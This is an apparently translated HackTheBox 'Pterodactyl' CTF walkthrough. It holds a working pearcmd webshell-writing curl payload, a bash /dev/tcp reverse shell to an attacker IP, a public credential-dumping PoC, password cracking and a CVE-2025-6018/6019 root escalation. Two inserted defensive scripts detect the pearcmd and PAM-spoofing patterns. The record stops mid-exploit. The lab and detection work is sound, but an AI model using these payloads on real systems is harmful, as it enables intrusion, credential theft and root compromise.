HackTheBox-Pterodactyl

Just like this, we'll overtake
the horizon,
we who fly at the very front line,
on a night without stars,
heading only ever east.


Target IP: 10.129.252.208

Difficulty: Medium

Topics covered:

  • Reconnaissance:
    • Port scanning and service enumeration (Nmap)
    • Web subdomain brute-forcing (Gobuster/VHost enumeration)
    • Web directory scanning (Dirsearch)
    • Open-source software version fingerprinting and vulnerability lookup (changelog analysis)
  • Web Exploitation:
    • CVE-2025-49132: Pterodactyl Panel information disclosure and its exploitation
    • PHP-PEAR abuse: pearcmd with config-create for local file inclusion/file write (LFI to RCE)
  • Post-Exploitation & Lateral Movement:
    • Database enumeration (MySQL/MariaDB)
    • Hash extraction and offline cracking (John the Ripper - bcrypt)
    • Credential reuse (credential stuffing via SSH)
  • Privilege Escalation:
    • System environment enumeration (LinPEAS/OS release)
    • CVE-2025-6018: PAM environment-variable misconfiguration allowing session spoofing
    • CVE-2025-6019: unsafe mount by libblockdev/udisks during an XFS resize operation

Port scan

┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl]
└─# nmap -p- -Pn 10.129.252.208
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-08 19:52 -0500
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.39% done
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.56% done
Stats: 0:04:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 77.49% done; ETC: 19:59 (0:01:27 remaining)
Stats: 0:05:36 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 80.69% done; ETC: 19:59 (0:01:20 remaining)
Nmap scan report for 10.129.252.208
Host is up (0.11s latency).
Not shown: 65065 filtered tcp ports (no-response), 466 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp closed https
8080/tcp closed http-proxy

Nmap done: 1 IP address (1 host up) scanned in 457.46 seconds

Visiting port 80 redirects to pterodactyl.htb.

The page also hints at another subdomain, play.pterodactyl.htb.

So we brute-force subdomains while we are at it.

┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl]
└─# gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://pterodactyl.htb/ --append-domain -t 25 | grep -v "301"
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://pterodactyl.htb/
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
[+] Append Domain: true
[+] Exclude Hostname Length: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
panel.pterodactyl.htb Status: 200 [Size: 1897]
#www.pterodactyl.htb Status: 400 [Size: 157]
#mail.pterodactyl.htb Status: 400 [Size: 157]
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kaada
255.255.255.255 broadcasthost
::1 localhost


192.168.56.253 hellman.nyx
10.129.229.224 analytical.htb data.analytical.htb
10.129.252.208 pterodactyl.htb play.pterodactyl.htb panel.pterodactyl.htb

Scan directories with dirsearch.

┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl]
└─# dirsearch -u http://pterodactyl.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/Pterodactyl/reports/http_pterodactyl.htb/__26-02-08_20-06-27.txt

Target: http://pterodactyl.htb/

[20:06:27] Starting:
[20:06:34] 403 - 555B - /.ht_wsr.txt
[20:06:34] 403 - 555B - /.htaccess.bak1
[20:06:34] 403 - 555B - /.htaccess.orig
[20:06:34] 403 - 555B - /.htaccess.sample
[20:06:34] 403 - 555B - /.htaccess.save
[20:06:34] 403 - 555B - /.htaccess_extra
[20:06:34] 403 - 555B - /.htaccess_orig
[20:06:34] 403 - 555B - /.htaccessBAK
[20:06:34] 403 - 555B - /.htaccessOLD2
[20:06:34] 403 - 555B - /.htaccessOLD
[20:06:34] 403 - 555B - /.html
[20:06:34] 403 - 555B - /.htaccess_sc
[20:06:34] 403 - 555B - /.htm
[20:06:34] 403 - 555B - /.htpasswd_test
[20:06:34] 403 - 555B - /.htpasswds
[20:06:34] 403 - 555B - /.httr-oauth
[20:06:54] 200 - 920B - /changelog.txt
[20:07:18] 200 - 72KB - /phpinfo.php
[20:07:20] 403 - 555B - /Public/

Task Completed

Visit /changelog.txt

MonitorLand - CHANGELOG.txt
======================================

Version 1.20.X

[Added] Main Website Deployment
--------------------------------
- Deployed the primary landing site for MonitorLand.
- Implemented homepage, and link for Minecraft server.
- Integrated site styling and dark-mode as primary.

[Linked] Subdomain Configuration
--------------------------------
- Added DNS and reverse proxy routing for play.pterodactyl.htb.
- Configured NGINX virtual host for subdomain forwarding.

[Installed] Pterodactyl Panel v1.11.10
--------------------------------------
- Installed Pterodactyl Panel.
- Configured environment:
- PHP with required extensions.
- MariaDB 11.8.3 backend.

[Enhanced] PHP Capabilities
-------------------------------------
- Enabled PHP-FPM for smoother website handling on all domains.
- Enabled PHP-PEAR for PHP package management.
- Added temporary PHP debugging via phpinfo()

It contains two important leads.

First, Pterodactyl Panel v1.11.10 is installed, and that version is affected by CVE-2025-49132:

CVE-2025-49132: In-depth Research Report on the Pterodactyl Panel Unauthenticated Remote Code Execution Vulnerability - FreeBuf

Second, PHP-PEAR is enabled, which the phpinfo page shows in more detail; this lays the groundwork for the RCE later on.

A word on Pterodactyl Panel: it is an open-source game server management panel used for games such as Terraria and Minecraft.

Visiting panel.pterodactyl.htb shows the panel's login page.

Since we already know the version is v1.11.10, we can use a publicly available PoC to obtain credentials.

63square/CVE-2025-49132: PoCs for CVE-2025-49132

0xtensho/CVE-2025-49132-poc

┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl]
└─# cd CVE-2025-49132

┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-49132]
└─# ls
dump-creds.py exploit.py LICENSE README.md test.py

┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-49132]
└─# python3 dump-creds.py http://panel.pterodactyl.htb
/home/kali/Desktop/Pterodactyl/CVE-2025-49132/dump-creds.py:20: SyntaxWarning: invalid escape sequence '\/'
expected = '{"..\/..\/config\/prologue":{"alerts":{"levels":["info","warning","danger","success"],"session_key":"alert_messages"}}}'
Target is vulnerable!
App key: base64:UaThTPQnUjrrK61o+Luk7P9o4hM+gl4UiMJqcbTSThY=

-- Database config --
{'default': 'mysql', 'connections': {'mysql': {'driver': 'mysql', 'url': '', 'host': '127.0.0.1', 'port': '3306', 'database': 'panel', 'username': 'pterodactyl', 'password': 'PteraPanel', 'unix_socket': '', 'charset': 'utf8mb4', 'collation': 'utf8mb4_unicode_ci', 'prefix': '', 'prefix_indexes': '1', 'strict': '', 'timezone': '+00:00', 'sslmode': 'prefer', 'options': {'1014': '1'}}}, 'migrations': 'migrations', 'redis': {'client': 'predis', 'options': {'cluster': 'redis', 'prefix': 'pterodactyl_database_'}, 'default': {'scheme': 'tcp', 'path': '/run/redis/redis.sock', 'host': '127.0.0.1', 'username': '', 'password': '', 'port': '6379', 'database': '0', 'context': []}, 'sessions': {'scheme': 'tcp', 'path': '/run/redis/redis.sock', 'host': '127.0.0.1', 'username': '', 'password': '', 'port': '6379', 'database': '1', 'context': []}}}

-- Filesystem config --
{'default': 'local', 'disks': {'local': {'driver': 'local', 'root': '/var/www/pterodactyl/storage/app', 'throw': ''}, 'public': {'driver': 'local', 'root': '/var/www/pterodactyl/storage/app/public', 'url': 'http://panel.pterodactyl.htb/storage', 'visibility': 'public', 'throw': ''}, 's3': {'driver': 's3', 'key': '', 'secret': '', 'region': '', 'bucket': '', 'url': '', 'endpoint': '', 'use_path_style_endpoint': '', 'throw': ''}}, 'links': {'/var/www/pterodactyl/public/storage': '/var/www/pterodactyl/storage/app/public'}}

-- Mail config --
{'default': 'smtp', 'mailers': {'smtp': {'transport': 'smtp', 'host': 'smtp.example.com', 'port': '25', 'encryption': 'tls', 'username': '', 'password': '', 'timeout': '', 'local_domain': 'panel.pterodactyl.htb'}, 'ses': {'transport': 'ses'}, 'mailgun': {'transport': 'mailgun'}, 'postmark': {'transport': 'postmark'}, 'sendmail': {'transport': 'sendmail', 'path': '/usr/sbin/sendmail -bs -i'}, 'log': {'transport': 'log', 'channel': ''}, 'array': {'transport': 'array'}, 'failover': {'transport': 'failover', 'mailers': ['smtp', 'log']}}, 'from': {'address': 'no-reply@example.com', 'name': 'Pterodactyl Panel'}, 'markdown': {'theme': 'default', 'paths': ['/var/www/pterodactyl/resources/views/vendor/mail']}}

We have obtained a set of MySQL login credentials:

pterodactyl:PteraPanel

Separately, we can use pearcmd together with config-create to write a webshell.

While dump-creds.py was retrieving the database credentials, the phpinfo page confirmed that register_argc_argv is enabled. That is what makes remote code execution through PHP's PEAR command-line tool (pearcmd.php) possible.

The attack relies on how PHP handles the URL query string under a specific configuration, combined with a local file inclusion (LFI) vulnerability.

  • RFC 3875 (CGI specification) and argument injection: per RFC 3875 section 4.4, when an HTTP request's query string contains no unencoded equals sign (=), the CGI interface passes the query string to the back-end interpreter as command-line arguments. In a URL, + decodes to a space, so a request of the form ?+config-create+... is parsed by the PHP interpreter as the command-line arguments config-create ...
  • The key setting register_argc_argv: register_argc_argv = On in php.ini is the prerequisite. When enabled, PHP fills the global variables $argc (argument count) and $argv (argument array) from the query-string arguments it receives.
  • Writing a file via pearcmd.php: pearcmd.php is the command-line entry point of the PEAR package manager; it ships by default under /usr/local/lib/php/ in Docker containers. The script reads the arguments in $argv and acts on them. We use PEAR's config-create command, normally used to create a configuration file, whose syntax is config-create <root_path> <filename>. By supplying a crafted <root_path> (containing PHP code) we can force PEAR to write that code into a file under the web directory.

Note that the webshell is written to /var/www/pterodactyl/public so that we can reach it directly.
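As an added example (not code from the write-up or from the PoC repositories), the following Python detector reads web-server access-log lines, reconstructs the $argv that register_argc_argv would hand to pearcmd by splitting the raw query string on '+', and flags the request shape described above. The log lines are constructed for the example, and the list of PEAR sub-commands it watches is an assumption you may extend.

```python
import re
from urllib.parse import unquote

# Constructed nginx "combined"-format log lines (not taken from the original
# write-up): a benign locale request, a request shaped like the pearcmd
# config-create abuse described above, and a plain traversal probe.
SAMPLE_LOG = r'''
10.10.14.11 - - [08/Feb/2026:20:10:01 -0500] "GET /locales/locale.json?locale=en&namespace=auth HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.11 - - [08/Feb/2026:20:20:12 -0500] "GET /locales/locale.json?locale=../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+/%3C?=system($_GET[0]);?%3E+/var/www/pterodactyl/public/shell.php HTTP/1.1" 200 1897 "-" "curl/8.5.0"
10.10.14.11 - - [08/Feb/2026:20:21:30 -0500] "GET /locales/locale.json?locale=../../../../etc/passwd&namespace=x HTTP/1.1" 500 0 "-" "curl/8.5.0"
'''.strip().splitlines()

# PEAR sub-commands that write files or fetch code when reached through $argv
# (assumed watch-list; extend as needed).
PEAR_COMMANDS = {"config-create", "config-set", "install", "upgrade",
                 "download", "channel-discover", "run-scripts"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)


def analyze_query(query: str) -> list:
    """Return sorted indicator names found in one raw (still URL-encoded) query string."""
    findings = set()
    decoded = unquote(query)
    if "../" in decoded or "..\\" in decoded:
        findings.add("traversal")
    if "pearcmd" in decoded.lower():
        findings.add("pearcmd-include")
    if "<?" in decoded:
        findings.add("php-open-tag")
    # With register_argc_argv=On, PHP builds $argv by splitting the *raw*
    # QUERY_STRING on '+', so reconstruct the argv PEAR would have seen.
    argv = [unquote(tok) for tok in query.split("+")]
    for arg in argv[1:]:
        if arg in PEAR_COMMANDS:
            findings.add("pear-argv:" + arg)
    return sorted(findings)


def parse_line(line: str):
    """Split one combined-format line into ip, status, path and raw query (None if unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "path": path, "query": query}


def scan_log(lines) -> list:
    """Annotate every parsable line with its indicators and an alert verdict.

    A line is an alert when a PEAR command shows up in the reconstructed argv
    together with a pearcmd include, or when a PHP open tag rides in the query."""
    records = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        f = rec["findings"] = analyze_query(rec["query"])
        has_cmd = any(x.startswith("pear-argv:") for x in f)
        rec["alert"] = (has_cmd and "pearcmd-include" in f) or "php-open-tag" in f
        records.append(rec)
    return records


if __name__ == "__main__":
    for rec in scan_log(SAMPLE_LOG):
        flag = "ALERT" if rec["alert"] else "ok   "
        print(flag, rec["ip"], rec["status"], rec["path"], rec["findings"])
```

Feed it real lines with `scan_log(open("/var/log/nginx/access.log"))`; a traversal-only hit is worth a look, but the alert verdict is reserved for the argv-level pattern.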

curl -g -s 'http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+/<?=system($_GET[0]);?>+/var/www/pterodactyl/public/shell.php'
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-49132]
└─# # Test command execution
curl "http://panel.pterodactyl.htb/shell.php?0=id"

#PEAR_Config 0.9
a:12:{s:7:"php_dir";s:32:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/php";s:8:"data_dir";s:33:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/data";s:7:"www_dir";s:32:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/www";s:7:"cfg_dir";s:32:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/cfg";s:7:"ext_dir";s:32:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/ext";s:7:"doc_dir";s:33:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/docs";s:8:"test_dir";s:34:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/tests";s:9:"cache_dir";s:34:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/cache";s:12:"download_dir";s:37:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/download";s:8:"temp_dir";s:33:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/temp";s:7:"bin_dir";s:28:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear";s:7:"man_dir";s:32:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/man";}

Now we can get a reverse shell.

┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-49132]
└─# curl "http://panel.pterodactyl.htb/shell.php?0=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.11/4444+0>%261'"

────────────────────────────────────────────────────────────────────────────────
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from pterodactyl-10.129.252.208-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/pterodactyl~10.129.252.208_Linux_x86_64/2026_02_08-20_23_10-028.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
wwwrun@pterodactyl:/var/www/pterodactyl/public>

With a shell, use the database credentials we just obtained to look for useful information.

mysql -u pterodactyl -p'PteraPanel' -h 127.0.0.1
wwwrun@pterodactyl:/var/www/pterodactyl/public> mysql -u pterodactyl -p'PteraPanel' -h 127.0.0.1
mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 83
Server version: 11.8.3-MariaDB MariaDB package

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| panel |
| test |
+--------------------+
3 rows in set (0.026 sec)

MariaDB [(none)]> use panel;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [panel]> show tables;
+-----------------------+
| Tables_in_panel |
+-----------------------+
| activity_log_subjects |
| activity_logs |
| allocations |
| api_keys |
| api_logs |
| audit_logs |
| backups |
| database_hosts |
| databases |
| egg_mount |
| egg_variables |
| eggs |
| failed_jobs |
| jobs |
| locations |
| migrations |
| mount_node |
| mount_server |
| mounts |
| nests |
| nodes |
| notifications |
| password_resets |
| recovery_tokens |
| schedules |
| server_transfers |
| server_variables |
| servers |
| sessions |
| settings |
| subusers |
| tasks |
| tasks_log |
| user_ssh_keys |
| users |
+-----------------------+
35 rows in set (0.001 sec)

MariaDB [panel]> select * from users;
+----+-------------+--------------------------------------+--------------+------------------------------+------------+-----------+--------------------------------------------------------------+--------------------------------------------------------------+----------+------------+----------+-------------+-----------------------+----------+---------------------+---------------------+
| id | external_id | uuid | username | email | name_first | name_last | password | remember_token | language | root_admin | use_totp | totp_secret | totp_authenticated_at | gravatar | created_at | updated_at |
+----+-------------+--------------------------------------+--------------+------------------------------+------------+-----------+--------------------------------------------------------------+--------------------------------------------------------------+----------+------------+----------+-------------+-----------------------+----------+---------------------+---------------------+
| 2 | NULL | 5e6d956e-7be9-41ec-8016-45e434de8420 | headmonitor | headmonitor@pterodactyl.htb | Head | Monitor | $2y$10$3WJht3/5GOQmOXdljPbAJet2C6tHP4QoORy1PSj59qJrU0gdX5gD2 | OL0dNy1nehBYdx9gQ5CT3SxDUQtDNrs02VnNesGOObatMGzKvTJAaO0B1zNU | en | 1 | 0 | NULL | NULL | 1 | 2025-09-16 17:15:41 | 2025-09-16 17:15:41 |
| 3 | NULL | ac7ba5c2-6fd8-4600-aeb6-f15a3906982b | phileasfogg3 | phileasfogg3@pterodactyl.htb | Phileas | Fogg | $2y$10$PwO0TBZA8hLB6nuSsxRqoOuXuGi3I4AVVN2IgE7mZJLzky1vGC9Pi | 6XGbHcVLLV9fyVwNkqoMHDqTQ2kQlnSvKimHtUDEFvo4SjurzlqoroUgXdn8 | en | 0 | 0 | NULL | NULL | 1 | 2025-09-16 19:44:19 | 2025-11-07 18:28:50 |
+----+-------------+--------------------------------------+--------------+------------------------------+------------+-----------+--------------------------------------------------------------+--------------------------------------------------------------+----------+------------+----------+-------------+-----------------------+----------+---------------------+---------------------+
2 rows in set (0.001 sec)

MariaDB [panel]>

We have two usernames and their corresponding hashes; let's crack them.

headmonitor:$2y$10$3WJht3/5GOQmOXdljPbAJet2C6tHP4QoORy1PSj59qJrU0gdX5gD2
phileasfogg3:$2y$10$PwO0TBZA8hLB6nuSsxRqoOuXuGi3I4AVVN2IgE7mZJLzky1vGC9Pi

The hash for user phileasfogg3 cracks successfully.

┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-49132]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!QAZ2wsx (phileasfogg3)

Trying the password over SSH, we log in successfully as phileasfogg3.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh phileasfogg3@10.129.252.208
The authenticity of host '10.129.252.208 (10.129.252.208)' can't be established.
ED25519 key fingerprint is: SHA256:FOOqnHbybkpXftYgyrorbBxkgW0L4yMSLYxG8F87SDE
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.252.208' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
(phileasfogg3@10.129.252.208) Password:
(phileasfogg3@10.129.252.208) Password:
Have a lot of fun...
Last login: Mon Feb 9 03:32:30 2026 from 10.10.14.11
phileasfogg3@pterodactyl:~> ls
bin user.txt
phileasfogg3@pterodactyl:~>

Upload linpeas and enumerate files that could be used for privilege escalation.

Analysis shows the system is:

OS: Linux version 6.4.0-150600.23.65-default (geeko@buildhost) (gcc (SUSE Linux) 7.5.0, GNU ld (GNU Binutils; SUSE Linux Enterprise 15) 2.43.1.20241209-150100.7.52) #1 SMP PREEMPT_DYNAMIC Tue Aug 12 00:37:41 UTC 2025 (aedcb04)

The CVE-2025-6018 and CVE-2025-6019 chain can be used to escalate privileges.

Security risk advisory: Linux local privilege escalation exploit chain (CVE-2025-6018, CVE-2025-6019) - 安全内参 | the decision-maker's cybersecurity knowledge base

Two-vulnerability chain takes root in one hit: CVE-2025-6018/CVE-2025-6019 sweeps mainstream Linux - FreeBuf

Vulnerability chain overview (Privilege Escalation Chain)

The attacker combines two openSUSE-specific vulnerabilities to escalate from an ordinary SSH user to root.

1. CVE-2025-6018: PAM misconfiguration (identity spoofing)

  • Principle: openSUSE's PAM (Pluggable Authentication Modules) configuration is flawed in that it lets a user logged in over SSH set specific environment variables through the ~/.pam_environment file.
  • Exploitation: by injecting environment variables, the attacker tricks the PolicyKit (polkit) authorization system into passing its allow_active policy check.
  • Core impact: a remote session is disguised as a local one. allow_active permissions are normally reserved for users physically logged in at the console. Once that restriction is bypassed, an SSH user can perform normally forbidden privileged D-Bus operations (such as mounting disks or managing system services).

2. CVE-2025-6019: unsafe mount in libblockdev/udisks (execution of the escalation)

  • Principle: the udisks service has a logic flaw when handling a resize operation on an XFS filesystem. When it temporarily mounts the filesystem in order to resize it, it does not enforce the nosuid mount option.
  • Exploitation:
    1. The attacker creates a malicious XFS filesystem image containing a SUID root shell (for example a copy of /bin/bash with the SUID bit set).
    2. Using the PolicyKit permissions obtained via CVE-2025-6018, the attacker triggers a "Resize" operation on that image through udisks.
    3. The system mounts the image without disabling SUID.
  • Core impact: SUID escalation becomes possible. The attacker can simply run the SUID binary planted in the image and obtain a root shell.

Attack chain summary

  1. Breaking access control (CVE-2025-6018): through the PAM flaw, a remote SSH user gains PolicyKit permissions equivalent to a "local physical user" and thus the right to call the udisks service.
  2. Running the escalation payload (CVE-2025-6019): exploiting udisks' failure to disable SUID during an XFS resize, mount the malicious disk image and run the SUID program inside it, ending up with root.

First, prepare for the escalation: create the PAM environment file so that allow_active becomes yes.

cat > ~/.pam_environment << 'EOF'
XDG_SEAT=seat0
XDG_VTNR=1
EOF

Log out of SSH and back in for the settings to take effect.

Active=yes
phileasfogg3@pterodactyl:~> loginctl show-session $(loginctl | grep $(whoami) | awk '{print $1}') | grep -E "Seat|Active"
Active=yes
Seat=seat0
Active=yes

Step 1: identity spoofing (CVE-2025-6018)

Core issue: the PAM configuration allows untrusted environment-variable injection.

  1. Background: on Linux, polkit (PolicyKit) provides fine-grained authorization. Many privileged operations (such as mounting disks) are by default allowed only for sessions that are Active and Local. A remote SSH login is normally considered "inactive" or "remote" and therefore may not call certain D-Bus interfaces of udisks.

  2. Vulnerability: openSUSE's PAM configuration mistakenly lets users set critical environment variables through the ~/.pam_environment file.

  3. Attack steps:

    • The attacker writes the following configuration into phileasfogg3's home directory:

      XDG_SEAT=seat0   # pose as a physical seat
      XDG_VTNR=1       # pose as a virtual terminal number

    • Effect: after logging in again over SSH, systemd-logind reads these variables and wrongly classifies the remote SSH session as "Seat=seat0" and "Active=yes".

    • Result: the attacker has bypassed polkit's restriction and can now send system-level D-Bus messages, including to udisks2.
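An added audit script, not part of the original write-up, covering the CVE-2025-6018 mechanism described in the overview and in Step 1: it reports PAM files that load pam_env.so with user_readenv=1 (the option assumed here to be what makes ~/.pam_environment honoured), home directories whose .pam_environment sets XDG_SEAT or XDG_VTNR, and loginctl sessions that are remote yet bound to a seat. The sample PAM file, home directories and loginctl output are constructed.

```python
import os
import re
import sys
from typing import Dict, List

# Variables systemd-logind uses to bind a session to a seat and virtual terminal;
# a remote SSH session that can set them looks "local and active" to polkit.
SEAT_VARS = {"XDG_SEAT", "XDG_VTNR"}

# Constructed samples (not from the original write-up): a PAM file that loads
# pam_env with user_readenv=1, three home directories, and `loginctl show-session`
# output for an SSH session placed on seat0 next to an ordinary one.
SAMPLE_PAM = {"common-session": "session required pam_env.so readenv=1 user_readenv=1\n",
              "sshd": "auth include common-auth\n"}
SAMPLE_HOMES = {"phileasfogg3/.pam_environment": "XDG_SEAT=seat0\nXDG_VTNR=1\n",
                "alice/.pam_environment": "EDITOR=vim\n",
                "bob/.bashrc": "export XDG_SEAT=seat0\n"}
SAMPLE_LOGINCTL = ("Id=7\nService=sshd\nRemote=yes\nSeat=seat0\nVTNr=1\nActive=yes\n\n"
                   "Id=2\nService=sshd\nRemote=yes\nSeat=\nVTNr=0\nActive=no\n")

def read_tree(root: str) -> Dict[str, str]:
    """Map path-relative-to-root -> text for every readable regular file under root."""
    out = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                with open(full, errors="replace") as fh:
                    out[os.path.relpath(full, root)] = fh.read()
            except OSError:
                continue
    return out

def find_user_readenv(pam_files: Dict[str, str]) -> List[str]:
    """PAM config files loading pam_env.so with user_readenv=1, i.e. honouring ~/.pam_environment."""
    hits = []
    for name, text in pam_files.items():
        for line in text.splitlines():
            line = line.split("#", 1)[0]  # ignore comments
            if "pam_env.so" in line and re.search(r"\buser_readenv=1\b", line):
                hits.append(name)
                break
    return sorted(hits)

def find_seat_spoofing(home_files: Dict[str, str]) -> Dict[str, Dict[str, str]]:
    """Per user, seat variables set in ~/.pam_environment (KEY=VAL or KEY DEFAULT=VAL)."""
    found = {}
    for path, text in home_files.items():
        user, _, fname = path.partition("/")
        if fname != ".pam_environment":
            continue
        seat_vars = {}
        for line in text.splitlines():
            m = re.match(r"^\s*(\w+)(?:\s+DEFAULT=|=)(\S*)", line)
            if m and m.group(1) in SEAT_VARS:
                seat_vars[m.group(1)] = m.group(2)
        if seat_vars:
            found[user] = seat_vars
    return found

def suspicious_sessions(loginctl_text: str) -> List[str]:
    """Ids of sessions logind reports as remote/sshd yet bound to a seat or VT."""
    ids = []
    for block in re.split(r"\n\s*\n", loginctl_text.strip()):
        props = dict(l.split("=", 1) for l in block.splitlines() if "=" in l)
        remote = props.get("Remote") == "yes" or props.get("Service", "").startswith("sshd")
        seated = props.get("Seat", "") != "" or props.get("VTNr", "0") not in ("", "0")
        if remote and seated:
            ids.append(props.get("Id", "?"))
    return ids

if __name__ == "__main__":
    print("user_readenv=1 in:", find_user_readenv(read_tree("/etc/pam.d")))
    print("seat vars in ~/.pam_environment:", find_seat_spoofing(read_tree("/home")))
    if not sys.stdin.isatty():  # pipe `loginctl show-session <ids>` output in
        print("remote sessions on a seat:", suspicious_sessions(sys.stdin.read()))
```

The loginctl check is the same signal the write-up reads off the box (Seat=seat0 and Active=yes on an SSH session), just evaluated from the defender's side.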

Download the public PoC:

guinea-offensive-security/CVE-2025-6019

Choose local mode to build the malicious image.

Remember to install the missing package first:

sudo apt install xfsprogs -y
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-6019-main]
└─# bash exploit.sh
PoC for CVE-2025-6019 (LPE via libblockdev/udisks)
WARNING: Only run this on authorized systems. Unauthorized use is illegal.
Continue? [y/N]: y
[+] All dependencies are installed.
[*] Checking for vulnerable libblockdev/udisks versions...
[*] Detected udisks version: unknown
[!] Warning: Specific vulnerable versions for CVE-2025-6019 are unknown.
[!] Verify manually that the target system runs a vulnerable version of libblockdev/udisks.
[!] Continuing with PoC execution...
Select mode:
[L]ocal: Create 300 MB XFS image (requires root)
[C]ible: Exploit target system
[L]ocal or [C]ible? (L/C): l
[*] Creating a 300 MB XFS image on local machine...
300+0 records in
300+0 records out
314572800 bytes (315 MB, 300 MiB) copied, 0.279727 s, 1.1 GB/s
meta-data=./xfs.image isize=512 agcount=4, agsize=19200 blks
= sectsz=512 attr=2, projid32bit=1
= crc=1 finobt=1, sparse=1, rmapbt=1
= reflink=1 bigtime=1 inobtcount=1 nrext64=1
= exchange=0 metadir=0
data = bsize=4096 blocks=76800, imaxpct=25
= sunit=0 swidth=0 blks
naming =version 2 bsize=4096 ascii-ci=0, ftype=1, parent=0
log =internal log bsize=4096 blocks=16384, version=2
